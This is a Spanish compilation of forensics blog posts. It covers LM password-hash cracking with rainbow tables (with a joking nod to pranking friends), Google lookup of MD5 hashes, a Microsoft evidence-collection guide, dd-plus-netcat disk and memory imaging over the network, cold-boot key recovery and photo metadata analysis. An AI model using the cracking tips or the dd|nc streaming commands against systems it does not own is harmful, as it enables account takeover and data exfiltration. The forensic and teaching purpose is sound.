Por otro lado, me queda la duda por qué los Sistemas Operativos existiendo estas técnicas, no aplican funciones aleatorias a los Hash antes de guardar la contraseña. Debo seguir leyendo para dilusidar una respuesta pero espero que algún lector que sepa más que yo nos adelante por qué no se implementan medidas para segurizar este aspecto.

Bueno, espero que hayan disfrutado este post tanto como yo. Les debía un post así de largo y portense bien y usen esta herramienta solo para probarla (o como mucho con algún amigo o hermano para hacerle una joda. Hasta ahí se lo permitimos…).

Conclusiones:

No se puede afirmar que un espacio o un símbolo es seguro, las tablas rainbow gratuitas que se usan en el live CD son alfanuméricas pero también es capaz de petar algunas contraseñas con símbolos… ¿Por qué?
El programa combina ataques por fuerza bruta y tablas rainbow, con el hash LM se puede dividir la contraseña en dos partes de 7 caracteres de los cuales los 4 primeros son extraídos por fuerza bruta incluidos los símbolos y espacios.
Con esto podemos deducir cuatro cosas:
-Las contraseñas alfanuméricas inferiores o iguales a 14 caracteres son todas crackeables.
-Las contraseñas superiores a 14 caracteres no se pueden saltar aunque sean alfanuméricas.
-Las contraseñas de 1 a 4 caracteres pueden contener símbolos o espacios.
-Las contraseñas de 8 a 11 caracteres pueden contener símbolos o espacios en los caracteres 8, 9, 10 y 11.
Con lo cual estas contraseñas se podrán saltar:
#
a#
a #
a %#
1234567#
1234567a#
1234567a #
1234567a b#
1234567 # %
Y estas otras no se podrán saltar:
1234#
1234a#
1234a #
1234a b#
1234567#abcde
abcdefghijklmnopqrstuvwxyz
Espero que os sea útil la información por vuestra propia seguridad

Debilidad en protocolo de autenticación NTLM
http://www.hispasec.com/unaaldia/1640

Si tienes el hash puedes usar google para sacr la palabra,
por ejemplo tienes c378985d629e99a4e86213db0cd5e70d (por ejemplo lo obtuviste de una tabla de Mysql)

http://www.google.com/search?q=c378985d629e99a4e86213db0cd5e70d

Aun antes de que existiera http://www.md5decrypter.co.uk/
google te regresaba paginas que tuvieran la palabra que se uso para generar el hash.

Fuente:

http://unmundobinario.com/2009/02/18/%C2%BFcrackear-un-password-en-5-minutos-%C2%A1funciona/

Una guía a la informática forense básica(microsoft)

Una guía a la informática forense básica

Tom Cloward and Frank Simorjay

Resumen:

• Guía fundamental de investigación de equipos para Windows
• Starter kit de eliminación de malware
• Creación de un kit de investigación con Windows PE
• Conservación de la información para el análisis forense

Existen innumerables maneras en las que usuarios malintencionados pueden usar un equipo para realizar actividades ilegales: piratería de sistemas, filtrado de secretos comerciales, liberación de nuevos virus, uso de mensajes de phishing para robar información personal y muchas más. Y continuamente recibimos noticias sobre ataques

y técnicas nuevos. Lo que no se oye tan a menudo es la manera en la que pueden usarse los equipos para investigar estos tipos de actividades.

Mientras algunas investigaciones dependen de profesionales altamente cualificados que usan herramientas costosas y técnicas complejas, hay métodos más fáciles y económicos que se pueden usar para realizar investigaciones y análisis básicos. En este artículo, nos centraremos en las técnicas de informática forense a las que puede tener acceso como administrador estándar.

Nuestra explicación se centra en dos aceleradores de soluciones que puede descargar de forma gratuita: "Guía fundamental de investigación informática para Windows" (go.microsoft.com/fwlink/?LinkId=80344) y Starter kit de eliminación de malware (go.microsoft.com/fwlink/?LinkId=93103). En este artículo, le mostraremos cómo puede combinar estas dos soluciones para crear un entorno arrancable de Windows® PE que le permitirá realizar una investigación efectiva y conservar sus conclusiones para la realización de informes y análisis. Tenga en cuenta que el método aquí descrito no se puede usar para investigar un disco duro cifrado o que forme parte de un volumen RAID. Además si el disco duro resulta dañado, necesitará realizar pasos adicionales por adelantado para restaurar su condición.

Aunque nuestra solución detalla una manera fácil de reunir pruebas en un equipo con Windows, tenga en cuenta que es un acercamiento básico ad hoc. Hay soluciones más sofisticadas disponibles comercialmente que pueden efectuar el trabajo resumido aquí de una manera mucho más efectiva.

Tenga presente también que la técnica que tratamos aquí no es una solución preceptiva garantizada ni certificada por "The International Society of Forensic Computer Examiners". Antes empezar una investigación, debe considerar si la evidencia hallada en el disco duro puede llegar a ser prueba en un proceso legal. Si existe esa posibilidad, se debería designar un examinador con certificación profesional para realizar la investigación. Dependiendo de la naturaleza del posible proceso legal, debe considerar también si debe ceder la investigación directamente a las autoridades competentes. Hay más información sobre este tema en la "Guía fundamental de investigación de equipos para Windows".

Acerca de los aceleradores de soluciones

La "Guía fundamental de investigación de equipos para Windows" trata de los procesos y herramientas que puede usar en una investigación interna de equipo. La guía resume las cuatro fases del modelo de investigación del equipo: valoración, obtención, análisis e informes. Se trata de un modelo sencillo que puede ayudar a profesionales de TI a realizar las investigaciones de una manera que conserve conclusiones importantes.

Esta guía cubre también cuando es necesario implicar a las autoridades competentes, debe tomar esta decisión junto con sus abogados. En ella puede encontrar información acerca de cómo administrar los delitos relacionados con el equipo, cómo ponerse en contacto con las autoridades competentes y las herramientas de Windows Sysinternals y otras herramientas de Windows que son útiles para realizar las investigaciones.

El otro acelerador de soluciones que mencionamos en este artículo, el Starter kit de eliminación de malware, ofrece orientación sobre cómo crear y usar el CD-ROM de arranque de Windows PE para quitar software malintencionado de un equipo. Esta guía incluye una lista de las amenazas y algunos de los factores atenuantes que pueden ayudar a reducir su posible impacto en una organización. Enfatiza también la importancia del desarrollo un plan de respuesta de incidente que puede seguirse en caso de que se sospeche un ataque de malware. El Starter kit de eliminación de malware incluye también un acercamiento de cuatro fases para ayudar a un profesional de TI a determinar la naturaleza del malware implicado, limitar su propagación, quitarlo si es posible, comprobar la eliminación y proceder con cualquier paso que pueda ser necesario.

El CD-ROM de Windows PE

Hay dos requisitos previos para ejecutar una investigación de este tipo: un CD-ROM de Windows PE y un dispositivo de almacenamiento externo, como una unidad flash de USB.

Probablemente ya haya visto la suficiente televisión como para saber que los agentes de policía deben dejar intacta la escena de un crimen. Por la misma razón, se deben conservar los datos en el disco duro investigado. A diferencia del disco del Starter kit de eliminación de malware, el disco arrancable de Windows PE que creamos sólo ejecutará herramientas que no alterarán en ningún modo los datos de disco duro.

El disco de Windows PE arrancará el sistema en un entorno limitado de Windows. Cuando se crea este CD de arranque, se pueden incluir herramientas (al igual que en el Starter kit de eliminación de malware) que se configuran de forma preliminar para un propósito especial. Tenga en cuenta que el equipo debe tener por lo menos 512 MB de RAM, ya que se trata de un requisito de Windows PE.

El proceso de creación del CD-ROM de Windows PE, detallado en el Starter kit de eliminación de malware, es bastante sencillo. Antes de crear este disco de arranque, necesitará instalar el Kit de instalación automatizada de Windows (AIK), el conjunto Sysinternals (disponible en microsoft.com/technet/sysinternals/utilities/sysinternalssuite.mspx), coloque las herramientas de Sysinternals en su lista de herramientas, tal como se ha detallado en la Tarea 2 del Starter kit de eliminación de malware e instale cualquier otra herramienta de análisis de malware y utilidades. Para obtener instrucciones detalladas sobre la creación del disco, use los pasos enumerados en el documento del Starter kit de eliminación de malware.

La unidad externa USB

Ya que este proceso no alterará la unidad de disco investigada, necesitará también una unidad USB o alguna otra clase de disco duro externo en el que pueda almacenar los archivos de salida que se generen. (Una unidad USB es el medio recomendado ya que Windows PE puede montar dispositivos USB de manera automática). Puede que también desee usar un disco duro externo para almacenar una imagen del disco duro original. Con todos estos requisitos y opciones, es muy importante que haga una planeación de antemano para tener en cuenta el espacio en disco total que necesitará la investigación.

Puesto que desea asegurarse de que el kit esté limpio cuando inicie una investigación, se deben haber eliminado previamente todos los datos anteriores de la unidad de disco externa que se va a usar para guardar los archivos de investigación. Esto se puede realizar de manera fácil con una utilidad de limpieza de disco duro que sobrescribe toda la superficie de escritura de la unidad. A continuación se puede dar formato al disco externo y etiquetarlo como sea necesario para su uso en la investigación. Esta precaución garantiza que el dispositivo no contendrá los archivos que podrían contaminar las evidencias que se reúnan durante la investigación.

También debe incluir un formulario de cadena de custodia para que haya documentación oficial acerca de quién ha administrado el equipo durante la investigación. La "Guía fundamental de investigación de equipos para Windows" ofrece un ejemplo de formulario de cadena de custodia. Una vez haya terminado el empaquetado del kit (con el disco de arranque necesario de Windows PE, dispositivo de almacenamiento externo y un formulario de cadena de custodia) estará listo para comenzar.

Ejecución de una investigación

Ahora está listo para realizar una investigación. Primero, arranque el sistema sospechoso usando el disco de Windows PE, asegurándose de que el orden de arranque del equipo identifica la unidad de CD-ROM como el dispositivo principal de arranque. Cuando se le pregunte, presione cualquier tecla para completar el arranque desde el CD-ROM. Esto le proporcionará acceso a las herramientas que ha instalado en el disco.

Usaremos nuestro kit en un equipo de muestra para demostrar cómo puede recopilar información de un equipo (que llamaremos Testbox1). La asignación de la unidad de CD en Testbox1 es X:\ y la ubicación predeterminada para las herramientas del Starter kit de eliminación de malware es X:\tools. Para tener acceso a las herramientas del kit, simplemente hay que escribir: cd \tools.

Hay varias herramientas que pueden identificar las unidades de destino montadas en un equipo. Bginfo.exe, que está ubicado en el directorio de herramientas Sysinternals, puede ofrecer esta información y colocarla en una ventana en segundo plano en el escritorio para una fácil referencia. Drive Manager también puede identificar todas las unidades de disco en el equipo, incluidas las unidades de disco duro de destino y el dispositivo USB externo. La figura 1 muestra la información de disco para Testbox1. La unidad de arranque es X:\, el disco duro destino es C:\, y nuestra unidad USB externa es F:\.

Figura 1 Visualización de la información de disco con Drive Manager

Comprobación de malware

Es importante ejecutar herramientas antimalware antes de comenzar una investigación para asegurar que la investigación no esté afectada por un virus ni otro código malintencionado. El informe que genera la herramienta antimalware puede usarse como prueba, si fuera necesario. La no comprobación de la existencia de malware en un equipo puede arriesgar la investigación, así como la credibilidad del investigador en lo que se refiere a rigurosidad y certeza. Recomendamos que ejecute las herramientas antimalware proporcionadas en modo de sólo lectura o de informe.

El Starter kit de eliminación de malware habla de varias herramientas recomendadas, incluidas la herramienta de eliminación de malware y McAfee AVERT Stinger. Cuando ejecute la herramienta de eliminación de malware, asegúrese de incluir la opción de línea de comando /N para indicar a la herramienta que sólo informe de la presencia de malware y no intente quitarlo:

Copiar código

x:\tools\windows-KB890830-v1.29.exe /N

El archivo resultante del informe estará ubicado en %windir%\debug\mrt.log.

De igual forma, cuando ejecute McAfee AVERT Stinger, cambie la preferencia a Report only (Sólo informar), como se muestra en la figura 2, para que examine el equipo pero no realice cambios en el disco duro. Y asegúrese de guardar un informe de la herramienta cuando se haya completado el examen.

Figura 2 Use el modo Report only (Sólo informar) en McAfee AVERT Stinger

Cómo guardar los archivos importantes

Si no se ha realizado una copia de seguridad del disco duro completo antes de comenzar la investigación, debe realizar copias de seguridad de, al menos, los archivos clave de usuario. La información de configuración puede usarse para una futura revisión si fuera necesario. Comience reuniendo los archivos de registro y la configuración, que contienen toda la información relevante acerca de cómo se ha usado el equipo y qué software está instalado en el sistema.

Para guardar el subárbol de registro para Testbox1, creamos primero una carpeta en la unidad extraíble F:\ y, a continuación, registramos la fecha y la hora en la que comenzó la investigación usando los comandos siguientes:

Copiar código

f:
Mkdir f:\evidence_files
Date /t >> f:\evidence_files\Evidence_start.txt
Time /t >> f:\evidence_files\Evidence_start.txt

Ahora guardamos el subárbol de registro usando el comando xcopy para copiar el directorio de configuración completo y sus contenidos. Los archivos de registro que nos interesan están ubicados en %windows%\system32\config. En nuestro caso, ejecutaremos lo siguiente:

Copiar código

xcopy c:\windows\system32\config\*.* f:\registrybkup /s /e /k /v

Este comando copia toda la información de configuración ubicada en la carpeta de configuración. Testbox1 contiene aproximadamente 95 MB de información en la carpeta de configuración.

A continuación, nos centramos en los datos de usuario, que pueden estar ubicados en cualquier parte del disco duro. Para nuestro ejemplo, estamos copiando datos solamente de un directorio llamado c:\HR. Para garantizar que los datos se recopilen completamente, copiaremos todos los datos en el directorio y sus subdirectorios usando el siguiente comando xcopy:

Copiar código

Mkdir f:\evidence_files\HR_Evidence
Mkdir f:\evidence_files\documents_and_settings
Mkdir f:\evidence_files\users
xcopy c:\HR\*.* f:\evidence_files\HR_Evidence /s /e /k /v

Ahora puede centrarse en la información personal de carpetas. De nuevo, queremos copiar todos los datos de estos directorios y sus subdirectorios. Para esto, usamos los comandos siguientes:

Copiar código

Xcopy c:\documents and settings\*.* f:\evidence_files\documents_and_settings /s /e /k /v

Xcopy c:\users\*.* f:\evidence_files\users /s /e /k /v

Este ejemplo recopiló cerca de 500 MB de datos, que podemos analizar si fuera necesario. Como puede ver, la cantidad de datos que está recopilando puede ser enorme, especialmente si encuentra los archivos de audio, vídeo y fotos. No obstante, es importante conservar la mayor cantidad posible de datos originales ya que una investigación puede requerir no sólo las evidencias que se reúnen físicamente, pero también la certeza de que esta información no ha sido alterada durante el proceso de recolección. Lo ideal sería que hiciera una imagen de disco completo para la investigación, pero esto puede ser difícil debido a las restricciones de tamaño. Como puede ver, es muy importante calcular de antemano cuánto espacio de almacenamiento puede requerir su investigación.

Reunión de información adicional

Los archivos de sistema también pueden ser un elemento útil en la recolección de pruebas, pero reunir estos datos puede requerir alguna exploración del equipo de destino, ya que estos archivos no siempre pueden estar ubicados en el mismo lugar. No obstante, merece la pena buscar ciertos tipos de archivos porque pueden ofrecer una perspectiva útil. Los archivos de paginación, por ejemplo, contienen información acerca de a qué archivos se ha tenido acceso a través de la memoria. Además, los archivos de paginación pueden proporcionar la actividad de uso detallada. De manera similar, los datos del explorador web y las cookies ofrecen información acerca del comportamiento y las pautas de exploración.

El hallar estos datos puede requerir un esfuerzo de investigación, especialmente si un usuario ha cambiado su configuración para almacenar los datos en algún lugar distinto de las ubicaciones predeterminadas. Hay varias herramientas de Sysinternals que pueden ayudarle a encontrar archivos importantes. La figura 3 ofrece una lista de cinco aplicaciones útiles y describe cómo pueden ayudarle en su investigación.

Figure 3 Herramientas para localizar archivos y datos de interés

Aplicación	Descripción
AccessChk	Muestra las rutas de acceso a los archivos, claves de registro y servicios de Windows por usuario o grupo que especifique.
AccessEnum	Muestra quién tiene acceso a qué directorios, archivos y claves de registro de un equipo. Puede usar esto para encontrar los lugares donde los permisos no se aplican apropiadamente.
Du	Muestra el uso de disco por directorio.
PsInfo	Muestra información acerca de un equipo.
Strings	Busca cadenas ANSI y UNICODE en imágenes binarias.

Tom Cloward, CCE, CISSP, es Director de programas en Microsoft, su principal objetivo es proporcionar aceleradores de soluciones de seguridad y cumplimiento para profesionales de TI. Ha trabajado en el sector de TI y software durante más de 15 años y es un apasionado de la seguridad de TI, la informática forense y el cumplimiento. Frank Simorjay, CISSP, CET, es Director técnico de programas y experto en asuntos de seguridad para el grupo de seguridad y cumplimiento de Microsoft Solution Accelerator. Diseña soluciones de seguridad para clientes de Microsoft. Uno de sus trabajos más recientes es el Starter kit de eliminación de malware, disponible en Microsoft TechNet.

Frank Simorjay, CISSP, CET, es Director técnico de programas y experto en asuntos de seguridad para el grupo de seguridad y cumplimiento de Microsoft Solution Accelerator. Diseña soluciones de seguridad para clientes de Microsoft. Uno de sus trabajos más recientes es el Starter kit de eliminación de malware, disponible en Microsoft TechNet.

© 2008 Microsoft Corporation and CMP Media, LLC. Reservados todos los derechos; queda prohibida la reproducción parcial o total sin previa autorización.

Fuente:http://technet.microsoft.com/es-es/magazine/2007.12.forensics.aspx

Adquisición de un sistema Windows sobre la red utilizando DD y Netcat

Para realizar este trabajo, vamos a utilizar las versiones de DD y Netcat que se encuentran dentro del FAU "Forensic Acquisition Utilities". El FAU, es un kit de herramientas que corren sobre Windows para analistas forenses, con versiones más especializadas de algunos comandos como DD y Netcat, y con otros muy útiles como Wipe, para borrar archivos de forma segura, fmdata, para obtener los metadatos y verificar los hashes de un archivo, y volume_dump, para visualizar información del disco y sus volumenes.

En Microsoft Windows se referencian los discos con la sintaxis "\\.\PhysicalDrive0", donde el 0 corresponde al número de disco, y si tuviéramos más discos serían 1, 2, 3, etc. Cuando usamos DD, le debemos indicar el parámetro de entrada "if=", que en este caso sería el disco "\\.\PhysicalDrive0" que queremos copiar, y el parámetro de salida "of=", que es la imagen hecha por DD de ese disco, y que en el siguiente ejemplo la vamos a guardar en otro disco local de nuestra computadora que posee la unidad "G:\".

dd.exe if=\\.\PhysicalDrive0 of=G:\DiscoLocal0.img

Hay que tener en cuenta que este tipo de imagenes no van a incluir áreas protegidas como HPA o DCO de los discos ATA. Por otro lado, si quisiéramos realizar solamente la imagen de un volumen del disco, como el "C:\", podríamos utilizar la siguiente sintaxis "\\.\C" en DD.

Cuando usamos Netcat, en primer lugar vamos a dejarlo escuchando en un puerto de nuestra computadora, direccionando todo lo que llegue a este a un archivo, como vemos a continuación:

nc.exe -l 9000 > WinXPvolumeC.img

En segundo lugar vamos a reemplazar la salida del comando DD "of=", por un direccionamiento de Netcat hacia la dirección IP y puerto de nuestra computadora en la red:

dd.exe if=\\.\C | nc.exe 10.1.1.22 9000

Otra cosa muy interesante con valor forense es realizar la imagen de la memoria del sistema, que en Windows se referencia con la siguiente sintaxis "if=\\.\PhysicalMemory", y que podríamos copiarla de la misma foma que en el ejemplo anterior:

dd.exe if=\\.\PhysicalMemory | nc.exe 10.1.1.22 9000

Por ultimo, también podríamos usar DD para realizar un hash MD5 de los datos que estamos copiando, esto es muy útil si queremos verificar que los datos no han sido alterados:

dd.exe if=\\.\C: of=G:\volC.img --md5sum --verifymd5 --md5out=G:\volC.md5

fuente:http://kungfoosion.blogspot.com/2007/06/adquisicin-de-un-sistema-windows-sobre.html

Who is "n3td3v"?

En Agosto del 2006, Neal Krawetz de Hacker Factor Solutions, presento en la famosa Black Hat su investigación llamada: “You Are What You Type: Non-Classical Computer Forensics”.

Su investigación permite realizar un “profiling” de un sospechoso realizando un análisis de las cosas que este ha escrito. Este profiling por ejemplo, permitiría determinar el sexo, cual es su lengua nativa, el nivel de educación que posee, una idea aproximada de su nacionalidad, etc.

Luego de dar su presentación en la Black Hat, Neal fue desafiado a encontrar la identidad del infame n3td3v, un personaje que apareció en la lista de seguridad Full Disclosure y que se dedica básicamente a insultar a reconocidas personalidades del ambiente.

Neal acepto el desafío, y tras realizar una muy bien documentada investigación escribió un informe titulado Who is “n3td3v”? en donde acusaba al retirado grupo de hackers GOBBLES de estar detrás del seudónimo n3td3v.

Como termina esta historia ? en el día de hoy, GOBBLES desafío a Neal Krawetz a que ambas partes se sometan a una prueba poligráfica para develar quién se encuentra mintiendo:

"A proposal is in the works for an upcoming security conference where we send a representative to the conference to meet with you, in person. The conference organizer will be responsible for providing an unbiased polygraph and polygraph technician."

Muy entretenido, y me obligo a darle una segunda leída a la presentación de Neal “You Are What You Type” que en un principio había subestimado. Próximamente les contaré como siguió todo esto…

http://kungfoosion.blogspot.com/2007/04/who-is-n3td3v.html

Metodologías sobre Análisis Forense

Aunque parezca mentira, es muy difícil encontrar en Internet material sobre metodologías y procedimientos de análisis forense.

Sin duda lo podríamos atribuir a que es una ciencia nueva, pero creo que también hay mucha falta de colaboración entre los profesionales del área, y tal vez una cuota de secretismo con todo lo relacionado al tema.

Hace unas semanas, este problema fue tratado en el podcast de CyberSpeak, y a causa de ello algunas organizaciones comenzaron a compartir los documentos que habían desarrollado.

La siguiente es la metodología que utiliza el Departamento de Justicia de los EEUU:

Otros que han publicado sus metodologías fue ACPO "Association of Chief Police Officers" de Inglaterra e Irlanda, pueden encontrar el documento en este link.

Si encuentran algún recurso interesante por favor no duden en enviármelo y yo lo distribuiré desde este Blog.

Fuente:http://kungfoosion.blogspot.com/2007/07/metodologas-sobre-anlisis-forense.html

dc3dd

Jesse Kornblum, un reconocido investigador forense, ha liberado la primera versión de su herramienta para realizar imágenes de disco llamada dc3dd.

dc3dd está basada en el GNU dd pero con utilidades específicas para un análisis forense. dc3dd incorporó ideas del conocido dcfldd, pero mientras que este sigue un desarrollo aparte, dc3dd es en realidad un patch de dd, por lo que todas las nuevas features de dd también estarán disponibles en dc3dd.

Algunas de las features que posee dc3dd y que no están en dd son:

• On the fly hashing with multiple algorithms (MD5, SHA-1, SHA-256, and SHA-512) with variable sized piecewise hashing.
• Able to write errors directly to a file
• Combined error log. Groups errors together (e.g. Had 1,023 'Input/ouput errors' between blocks 17-233' )
• Pattern wiping. Wipe output files with a single hex digit or a text pattern
• Verify mode
• Progress reports. See the progress of the operation while it's running
• Split output. Able to split output files into fixed size chunks

fuente:http://kungfoosion.blogspot.com/2008/02/dc3dd.html

Ataques Contra Claves de Cifrado de Discos Duros

La Universidad de Princeton publicó una investigación en la que demuestra la posibilidad de recuperar la clave simétrica de cifrado de discos duros.

La investigación logró demostrar que es posible recuperar información de la memoria DRAM, hasta 1 minuto después de que el computador se ha apagado, y más tiempo aún si se la enfría con nitrógeno líquido.

Video presentando la investigación:

Imagen recuperada después de 30 segundos de apagado el computador, con poca pérdida de nitidez:

La memoria introducida en nitrógeno líquido, observen el detalle de “do not drink” ;)

Más info: Full research paper
Fuente:http://kungfoosion.blogspot.com/2008/02/ataques-contra-claves-de-cifrado-de.html

Los Metadatos de Cristina

Hago referencia a este trabajo realizado por kungfoosion sobre la busqueda de metadatos sobre imagenes, de verdad es muy buena la investigacion y por eso la comparto

---------------------------------------------------------------------------------------------------

Hace tiempo que quería jugar con exiftool, una herramienta que permite leer y modificar los metadatos de imágenes digitales, y que mejor lugar para hacerlo que la fotogalería de presidencia de la nación.

En la fotogalería de presidencia, solamente se encuentran las fotos del actual presidente, por lo que me baje muchas fotos del comienzo de la gestión de Cristina, mas algunas de la actualidad, y realice una pequeña comparación de los metadatos de las mismas.

A continuación un ejemplo, con la salida recortada para que se pueda visualizar mejor:

~/kfs # exiftool 22120802.jpg

ExifTool Version Number         : 7.37
File Name                       : 22120802.jpg
File Size                       : 353 kB
File Type                       : JPEG
Image Description               : 22-12-08 Buenos Aires - La presidenta de la Nacion, Cristina Fernandez de Kirchner durante
los anuncios en la Quinta de Olivos.
Make                            : NIKON CORPORATION
Camera Model Name               : NIKON D100s
Software                        : Adobe Photoshop CS2 Macintosh
Modify Date                     : 2008:12:22 13:54:23
Date/Time Original              : 2008:12:22 14:25:32
Create Date                     : 2008:12:22 14:25:32
Components Configuration        : YCbCr
Writer-Editor                   : Presidencia de la Nacion
Photoshop Thumbnail             : (Binary data 7907 bytes, use -b option to extract)
Creator Tool                    : Adobe Photoshop CS2 Macintosh
Image Size                      : 2100x1493
Primary Platform                : Microsoft Corporation

Lo mas interesante que pude encontrar en la mayoría de las fotos, me llevo directamente al fotógrafo presidencial, que se llama Victor Bugge, y hace alrededor de 30 años que es el responsable de fotografiar a todos los presidentes de la Argentina.

Googleando a Victor Bugge, podemos llegar a muchas entrevistas que se le hicieron, en donde confirma cierta información que podemos encontrar en los metadatos, como que la cámara que utiliza es una Nikon.

Poder identificar la cámara con la que se tomo una foto es muy interesante para los casos de pedofilia, en donde queremos probar la relación entre varias fotos digitales y la cámara perteneciente a un sospechoso.

Otra cosa interesante, son los thumbnails que también se encuentran guardados en los metadatos, y que podemos extraer de la siguiente forma:

exiftool -b -ThumbnailImage 22120802.jpg > thumbnail.jpg

La imagen "thumbnail.jpg" debería ser una muestra mas pequeña y de menor calidad de la foto original.

Todos los thumbnails que extraje correspondían a la foto original, pero puede llegar a pasar que ambas imágenes sean diferentes. Hay un caso muy famoso, de una conductora de televisión llamada Catherine Schwartz, que publico en su blog una foto de su cara, recortada de otra imagen. Resulta que al extraer el thumbnail, se podía visualizar la foto original de cuerpo completo en donde ella se encontraba desnuda.

Otra cosa que aparece en los metadatos, es que se utilizo Photoshop, desde la versión CS2 a la CS4, y para plataformas Windows y principalmente Macintosh. Probablemente, el Sr. Bugge cuente con por los menos dos equipos para su trabajo, tal vez una desktop y una laptop.

Ahora, ¿ para que se utilizo Photoshop ? sin ser mal pensados, podríamos decir que para reducir el tamaño de las imágenes, ya que los originales deben ser muy grandes para que se las baje todo el publico desde la Web.

Para comprobar esto, vamos a usar un programa llamado Jpegquality. Jpegquality fue desarrollado por Neal Krawetz, y permite estimar la calidad de un JPEG analizando las tablas de cuantización:

~/kfs # ./jpegquality 22120802.jpg
#File: 22120802.jpg

Quantization table
Precision=0; Table index=0 (luminance)
   6   4   4   7   5   7  11   6
   6  11  14  10   8  10  14  17
  14  14  14  14  17  22  19  19
  19  19  19  22  17  12  12  12
  12  12  12  17  12  12  12  12
  12  12  12  12  12  12  12  12
  12  12  12  12  12  12  12  12
  12  12  12  12  12  12  12  12
Estimated quality level = 87.49%
Precision=0; Table index=1 (chrominance)
   7   9   9  19  12  19  34  19
  19  34  20  14  14  14  20  20
  14  14  14  14  20  17  12  12
  12  12  12  17  17  12  12  12
  12  12  12  17  12  12  12  12
  12  12  12  12  12  12  12  12
  12  12  12  12  12  12  12  12
  12  12  12  12  12  12  12  12
Estimated quality level = 85.90%
Average quality: 87.99% (88%)
~/kfs #

Como podemos apreciar, la calidad de la imagen es de un 88%, por lo que podríamos suponer que fue "grabada" nuevamente con un tamaño menor, ya que generalmente las fotos totalmente originales suelen tener un 98% de calidad.

Para un próximo post, voy a investigar algunas técnicas un poco mas complejas para detectar modificaciones en las imágenes digitales, mientras tanto les dejo algunos links con mas información.

Mas información:

- Exiftool (basada en Perl, funciona en cualquier plataforma)
- Jpegquality de Neal Krawetz

- Creating Custom Userlists from Document Metadata
- Image Ballistics and Photo Fingerprinting
- Técnicas de extracción de metadatos en imágenes fotográficas para análisis forense
- La Fotografía Digital como Evidencia: Auténtica o Fraude
- La Fotografía Digital como Evidencia Digital (2ª parte)
- The Metadata of Politics: Obama's official digital photo

fuente:http://kungfoosion.blogspot.com/2009/01/los-metadatos-de-cristina.html